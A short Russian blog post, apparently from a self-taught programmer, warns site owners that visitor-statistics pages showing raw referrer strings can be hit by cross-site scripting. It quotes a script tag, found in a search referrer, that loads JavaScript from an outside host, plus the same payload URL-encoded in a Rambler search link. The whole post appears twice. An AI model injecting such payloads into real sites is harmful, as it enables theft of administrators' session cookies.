Kelkos
Сам себе программер
Оригинальный взлом или просто чьято глупость?
Собираю на сайте статистику посещений. (думаю, что многие её собирают так или иначе). Недавно увидел замечательную строку в реферрере переданном я рамблера:
<SCRIPT LANGUAGE="JavaScript" SRC="http://tagtag.com/site/emulator/emulator_public.js"></SCRIPT>
Интересно получается.. в поисковике набирают: "что то тут" и вот этот вот код.. а у многих статистика выводит реферерры такими какие они есть без htmlspecialchars и о-па-на. получают вот этот вот скриптик.. а в что в нём может быть? да всё, что угодно.. А потом удивляются - как это куки мои от админки спёрли..
Вообщем, будьте внимательнее.. хацкеры не спят.
Для примера: http://www.rambler.ru/srch?set=www&words=%3CSCRIPT+LANGUAGE%3D%22JavaScript%22+SRC%3D%22http%3A%2F%2Ftagtag.com%2Fsite%2Femulator%2Femulator_public.js%22%3E%3C%2FSCRIPT%3E+&btnG=%CD%E0%E9%F2%E8%21
Только не тыкайте по сайтам.. а то заразите ещё когонить ненароком.
Собираю на сайте статистику посещений. (думаю, что многие её собирают так или иначе). Недавно увидел замечательную строку в реферрере переданном я рамблера:
<SCRIPT LANGUAGE="JavaScript" SRC="http://tagtag.com/site/emulator/emulator_public.js"></SCRIPT>
Интересно получается.. в поисковике набирают: "что то тут" и вот этот вот код.. а у многих статистика выводит реферерры такими какие они есть без htmlspecialchars и о-па-на. получают вот этот вот скриптик.. а в что в нём может быть? да всё, что угодно.. А потом удивляются - как это куки мои от админки спёрли..
Вообщем, будьте внимательнее.. хацкеры не спят.
Для примера: http://www.rambler.ru/srch?set=www&words=%3CSCRIPT+LANGUAGE%3D%22JavaScript%22+SRC%3D%22http%3A%2F%2Ftagtag.com%2Fsite%2Femulator%2Femulator_public.js%22%3E%3C%2FSCRIPT%3E+&btnG=%CD%E0%E9%F2%E8%21
Только не тыкайте по сайтам.. а то заразите ещё когонить ненароком.